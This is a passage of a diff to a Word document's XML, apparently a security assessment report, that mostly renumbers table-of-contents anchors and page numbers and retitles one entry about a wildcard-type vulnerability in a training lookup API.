+        <w:t xml:space="preserve">it </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">can </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>either be fixed or left out as no unintended information can be leaked from there</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -952,7 +974,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc71393713" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399616" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -979,7 +1001,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393713 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399616 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1024,7 +1046,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393714" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399617" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1051,7 +1073,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393714 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399617 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1096,7 +1118,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393715" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399618" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1123,7 +1145,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393715 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399618 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1168,7 +1190,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393716" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399619" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1203,7 +1225,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393716 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399619 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1248,7 +1270,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393717" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399620" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1276,7 +1298,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393717 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399620 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1321,7 +1343,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393718" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399621" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1349,7 +1371,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393718 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399621 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1394,7 +1416,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393719" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399622" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1422,7 +1444,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393719 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399622 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1467,7 +1489,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393720" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399623" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1495,7 +1517,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393720 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399623 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1540,7 +1562,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393721" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399624" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1568,7 +1590,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393721 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399624 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1613,7 +1635,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393722" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399625" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1641,7 +1663,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393722 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399625 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1686,7 +1708,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393723" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399626" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1714,7 +1736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393723 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399626 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1759,7 +1781,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393724" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399627" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1786,7 +1808,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393724 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399627 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1831,7 +1853,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393725" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399628" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1859,7 +1881,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393725 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399628 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1904,7 +1926,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393726" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399629" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1932,7 +1954,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393726 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399629 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1977,7 +1999,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393727" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399630" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2005,7 +2027,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393727 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399630 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2050,7 +2072,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393728" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399631" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2078,7 +2100,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393728 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399631 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2123,7 +2145,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393729" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399632" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2151,7 +2173,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393729 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399632 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2196,7 +2218,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393730" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399633" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2224,7 +2246,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393730 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399633 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2269,7 +2291,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393731" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399634" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2297,7 +2319,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393731 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399634 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2342,7 +2364,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393732" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399635" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2369,7 +2391,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393732 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399635 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2414,7 +2436,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393733" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399636" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2442,7 +2464,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393733 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399636 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2487,7 +2509,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393734" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399637" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2515,7 +2537,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393734 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399637 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2560,7 +2582,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393735" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399638" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2588,7 +2610,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393735 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399638 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2633,7 +2655,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393736" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399639" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2661,7 +2683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393736 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399639 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2706,7 +2728,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393737" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399640" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2734,7 +2756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393737 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399640 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2779,7 +2801,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393738" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399641" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2807,7 +2829,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393738 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399641 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2852,7 +2874,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393739" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399642" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2880,7 +2902,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393739 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399642 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2925,7 +2947,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393740" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399643" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -2952,7 +2974,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393740 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399643 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2997,7 +3019,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393741" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399644" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3025,7 +3047,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393741 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399644 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3070,7 +3092,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393742" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399645" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3098,7 +3120,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393742 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399645 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3143,7 +3165,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393743" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399646" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3171,7 +3193,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393743 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399646 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3216,7 +3238,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393744" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399647" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3244,7 +3266,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393744 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399647 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3289,7 +3311,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393745" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399648" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3317,7 +3339,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393745 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399648 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3362,7 +3384,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393746" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399649" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3390,7 +3412,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393746 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399649 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3435,7 +3457,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393747" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399650" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3463,7 +3485,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393747 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399650 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3508,7 +3530,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393748" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399651" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3529,7 +3551,7 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>card attack vulnerability present in the API for trainings</w:t>
+              <w:t>card attack vulnerability present in the API for training lookup</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3550,7 +3572,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393748 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399651 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3570,7 +3592,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3595,7 +3617,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393749" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399652" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3623,7 +3645,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393749 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399652 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3643,7 +3665,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3668,7 +3690,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393750" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399653" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3696,7 +3718,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393750 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399653 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3716,7 +3738,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3741,7 +3763,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393751" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399654" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3769,7 +3791,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393751 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399654 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3789,7 +3811,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3814,7 +3836,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393752" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399655" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3842,7 +3864,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393752 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399655 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3862,7 +3884,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3887,7 +3909,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393753" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399656" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3915,7 +3937,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393753 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399656 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3935,7 +3957,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3960,7 +3982,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393754" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399657" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3988,7 +4010,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71393754 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71399657 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4008,7 +4030,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>12</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4033,7 +4055,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71393755" w:history="1">
+          <w:hyperlink w:anchor="_Toc71399658" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4061,7 +4083,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
